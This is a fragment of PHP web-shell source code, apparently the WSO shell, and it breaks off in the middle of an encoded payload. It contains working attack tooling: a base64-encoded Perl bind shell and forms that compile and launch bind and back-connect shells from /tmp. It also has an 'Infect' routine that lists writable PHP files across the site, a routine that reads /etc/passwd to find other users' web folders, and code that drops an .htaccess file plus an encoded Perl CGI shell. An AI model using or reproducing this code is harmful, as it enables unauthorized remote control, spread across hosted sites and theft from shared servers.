$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
?>
<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
</form>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
</form><br>
<?php
if(isset($_POST['p1'])) {
function cf($f,$t) {
$w=@fopen($f,"w") or @function_exists('file_put_contents');
if($w) {
@fwrite($w,base64_decode($t)) or @fputs($w,base64_decode($t)) or @file_put_contents($f,base64_decode($t));
@fclose($w);
}
}
if($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c",$bind_port_c);
$out = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out
".ex("ps aux | grep bp")."</pre>";
}
if($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl",$bind_port_p);
$out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
echo "<pre class=ml1>$out
".ex("ps aux | grep bp.pl")."</pre>";
}
if($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c",$back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out
".ex("ps aux | grep bc")."</pre>";
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out
".ex("ps aux | grep bc.pl")."</pre>";
}
}
echo '</div>';
printFooter();
}
function actionInfect() {
printHeader();
echo '<h1>Infect</h1><div class=content>';
if($_POST['p1'] == 'infect') {
$target=$_SERVER['DOCUMENT_ROOT'];
function ListFiles($dir) {
if($dh = opendir($dir)) {
$files = Array();
$inner_files = Array();
while($file = readdir($dh)) {
if($file != "." && $file != "..") {
if(is_dir($dir . "/" . $file)) {
$inner_files = ListFiles($dir . "/" . $file);
if(is_array($inner_files)) $files = array_merge($files, $inner_files);
} else {
array_push($files, $dir . "/" . $file);
}
}
}
closedir($dh);
return $files;
}
}
foreach (ListFiles($target) as $key=>$file){
$nFile = substr($file, -4, 4);
if($nFile == ".php" ){
if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
echo "$file<br>";
$i++;
}
}
}
echo "<font color=red size=14>$i</font>";
}else{
echo "<form method=post><input type=submit value=Infect name=infet></form>";
echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
}
printFooter();
}
/* additional adds */
function actionReadable(){
printHeader();
echo '<h1>Subdomain</h1><div class=content>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea rows="20%" cols="100%" class="output" >';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
";
echo "[+] Founded ".sizeof($pub)." readable public_html directories
";
echo "[~] Searching for passwords in config files...
";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
echo "$path
";
}
echo "
";
echo "[+] Done...
";
echo '</textarea><br></body></html>';
echo '</div>';
printFooter();
}
function actionCgiShell(){
printHeader();
echo '<h1>Cgitelnet</h1><div class=content>';
mkdir('cgitelnet1', 0755);
chdir('cgitelnet1');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
$metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .cin
AddHandler cgi-script .cin";
fwrite ( $dosya , $metin ) ;
fclose ($dosya);
$cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
